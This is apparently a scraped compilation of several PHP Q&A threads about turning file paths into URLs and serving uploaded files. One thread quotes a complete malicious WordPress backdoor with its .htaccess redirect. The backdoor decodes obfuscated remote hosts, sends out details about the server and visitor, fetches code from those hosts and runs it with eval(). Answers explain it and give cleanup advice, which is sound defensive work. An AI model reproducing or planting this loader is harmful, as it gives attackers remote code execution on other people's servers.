I'm trying to add a link which allows users to view uploaded files.
Right now I have this:
$path = "http://" . APACHE_ROOT . UPLOAD_PATH . $result[0]['username'] . "ref_" . $ref_info[$i]['ref_email'] ."_" . $ref_info[$i]['year'];
$status = ' Uploaded ';
(Where:
APACHE_ROOT = /var/www/faculty-recruiting-ref/
UPLOAD_PATH = html/upload/
)
But I get an error that the url doesn't exist (specifically, "Google Chrome could not find var")
I also tried starting the url with "file://" but then the link does not respond.
Thanks!
PS If anyone thinks of a better title for this, please change it! I couldn't think of anything better.
EDIT: I should add that manually typing in the url does link to the correct file
/var/www/faculty-recruiting-ref/ is the local path for your server, it cannot be accessed from the outside.
The APACHE_ROOT should be replaced by something like www.yourdomain.com/faculty-recruiting-ref/
Related
I'm trying to stream PDF files so it's visible on the necessary page, but what I've tried up to now doesn't work at all. I'm trying BarryVdh/domPDF right now, but keep getting "This file extension is forbidden" and I don't know how to fix it.
public function paycheck($id)
{
$payments = Payment::findOrFail($id);
$filename = $payments->file_name;
$foldername = storage_path('app/public/loonstrookjes');
$pathToFile= '/'. $foldername . '/' . $payments->filename;
$pdf = PDF::loadFile($pathToFile)->stream($filename . '.pdf');
dd($pdf);
$file_url = Storage::url('app/public/' . $payments->file_name);
return view('paychecks.details', compact('payments', 'file_url', 'pdf'));
}
This is the function I'm trying to use right now, which is giving the "forbidden" error. Eventhough last time I checked the dd does show the right file path and name.
The ideal image would be a password having to be filled in before the PDF gets shown, but until then it would be great to get the PDF to show in general.
Please I hope anybody will be able to help.
Try this and see if it will display the document first
$payment= Payment::find($id);
return response()->file(public_path().'/documentfolder/'.$payment->file_name);
So I'm working on a website currently on localhost. I'm testing an image uploader, and I have to generate an URL for the image to be displayed..
etc etc..
// move the file to folder <- it works
move_uploaded_file($_FILES["file"]["tmp_name"], '../../common/img/post-uploads/' . $name);
// Generate response.
$response = new StdClass;
$response->link = MAINFOLDER . '/common/img/post-uploads/' . $name; // but I need an URL here..?:/
echo stripslashes(json_encode($response));
As you see, when I move the uploaded file to path, it works like this "../../common/img/post-uploads"
but at the end, I would like to get an URL.. so the final diplayed image would be like
< img src="http://localhost/mysite/common/image/post-uploads/image.jpg">
is it possible somehow? like
$response->link = convertThisToURL('../../common/img/post-uploads/' . $name);
? :/
Since you show two ../ I would think that this item is outside of your domain. There isn't a way to do that unless the full link is inside the domain directory.
Per your comment below then answer then would be a symbolic link.
ln -s /localhost/mysite/common/img/post-uploads /localhost/mysite/images
For example. then just post that nice new url without all that ../ stuff
Alright so everything is being saved properly but how can I get the url of the file I am saving?
$songs = file_get_contents('https://example.com/tracks/'.$id.'/');
file_put_contents('./tmp/' . stripslashes(htmlspecialchars($songTitle)) . '.mp3', $songs);
Without manually having to get every url, please note I am a new developer still learning.. but is there not something I can just echo into an ??
Edit: ' . stripslashes(htmlspecialchars($songTitle)) . ' this is just the name of the file that we're downloading, nothing important about that string.
This depends on your setup, but if your script is in an externally accessible location and you trust $_SERVER client-defined fields, you can use __FILE__ and $_SERVER to accomplish what you want.
The code below assumes:
Your server is not on HTTPS;
Files in the subdirectory tmp can be accessed externally;
You can write to the subdirectory tmp.
$_SERVER['HTTP_HOST'] and $_SERVER['REQUEST_URI'] can be "trusted".
Try this:
// This is the only thing you need to set to your taste.
$dest_rel_path = 'tmp/' . stripslashes(htmlspecialchars($songTitle)) . '.mp3';
// This is the final file path in your filesystem.
// `dirname(__FILE__)` can be replaced with __DIR__ in PHP >= 5.3.0
// and the str_replace() part makes the code portable to Windows.
$filesystem_path = dirname(__FILE__) . DIRECTORY_SEPARATOR . str_replace('/', DIRECTORY_SEPARATOR, $dest_rel_path);
$songs = file_get_contents('https://example.com/tracks/'.$id.'/');
file_put_contents($filesystem_path, $songs);
// This takes the URL that the user requested and replaces the
// part after the last '/' with our new .mp3 location.
$req_uri = $_SERVER['REQUEST_URI'];
$url_path = substr($req_uri, 0, 1 + strrpos($req_uri, '/')) . $dest_rel_path;
$url = 'http://' . $_SERVER['HTTP_HOST'] . $url_path;
echo "This is my link to $songTitle!";
You can't, at least not directly, since it does not work that way: the filesystem does not necessarily translate to an URL.
For instance, in your case, you're saving the file into the tmp directory. I doubt that directory is accessible in any way to the outside world, ie, that it has a public URL than you can access in your browser.
I have found this script scattered around my Wordpress uploads folder on my shared host. I don't know how it got there, I have always been using the latest versions of Wordpress and all my plugins.
The script has been scattered into all possible sub-folders within my uploads folder, with a helper .htaccess file, to direct traffic to this script. It is only found inside the uploads folder, no files outside it.
Can you help me decode what this script was doing and how could I recover from it if it did anything bad?
Here is the helper .htaccess file,
Options -MultiViews
ErrorDocument 404 //wp-content/uploads/54580.php
And here is the main script (or in pastebin),
error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cnNzbmV3cy53cw==");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "ceaa2f454d1892ee1d5c3f777e07144d") $f = $_REQUEST["id"];
if ($c = file_get_contents(base64_decode("aHR0cDovLzdhZHMu") . $f . $z)) eval($c);
else if ($c = file_get_contents(base64_decode("aHR0cDovLzcu") . $f . $z)) eval($c);
else {
$cu = curl_init(base64_decode("aHR0cDovLzcxLg==") . $f . $z);
curl_setopt($cu, CURLOPT_RETURNTRANSFER, 1);
$o = curl_exec($cu);
curl_close($cu);
eval($o);
}
;
die();
First, it turns off error reporting, making sure that if something goes wrong, nobody will see the error message.
then, it seems to download a file from another server.
The IP address of that server has been obfuscated by jumbling it a bit, and base64encoding the fragments.
The complex spaghetti-code of if-statements reassembles it into a (probably) valid server IP address.
If it can download that file, it will eval() it, meaning that it will interpret it as PHP, and run it.
Can you help me decode what this script was doing
It loads a payload from some other server and executes it.
and how could I recover from it if it did anything bad?
Remove the script. Restore the backup of your site that was not tainted. Get in contact with someone experienced with such problems and get a review of your site and better directions for the future.
It's calling a remote url, maybe for sendin information.
7ads.rssnews.com or 7.rssnews.com
I think, that you should delete this file from your webserver, it does not seem to be secure.
Delete this line from the .htacces in your root folder
ErrorDocument 404 //wp-content/uploads/54580.php
Delete all files with the name 54580.php
Give write public permissions only on wp-content/uploads
Give read permissions for public for the rest.
What it does now ... It is sending some information to rssnews(dot)ws
Also take a look at which plugins have the ability to upload files into the uploads directory. There is a file on there somewhere that is being used to upload files, and just because all your plugins are up to date, does not mean that they are being utilized by attackers.
Some plugin coders have not kept their plugins up to date even though exploits have been discovered in them. Some plugins are being exploited at the moment for which no exploit has been made public, and there are also a couple of issues that Wordpress themselves have deemed not bad enough to fix.
Example: http://goo.gl/EfMTJ
Also if you have been hacked before, you may have missed a shell code (backdoor file) which could also still be resident in your web folders. The reason uploads is being used is probably for two reasons, one is that it is probably writable by the webserver, and two is that it is the common folder which plugins and the main site uses to upload files to.
Hy!
I parse a website with simplehtml dom to get all links from the pictures.
The problem is that the link is like "/pics/bla.jpg".
I have the full path from the website like "http://xxx.xxx/blob/gulsch".
Now i want to get the full image link from the image (link root + /pics/bla.jpg) (no concat)
like: http://xxx.xxx/pics/bla.jpg
This should work for many websites
I tried it with explode()
$root = explode("/", $link);
echo $root[2];
I never get it working.
Please help.
Try with parse_url:
$r = parse_url($websiteUrl);
$imageUrl = $r["scheme"] . "://" . $r["host"] . "/" . $imageRelativeUrl;
The "root" of the website is simply $r["host"].
Given the parts of a URL, you can build a full URL with http_build_url.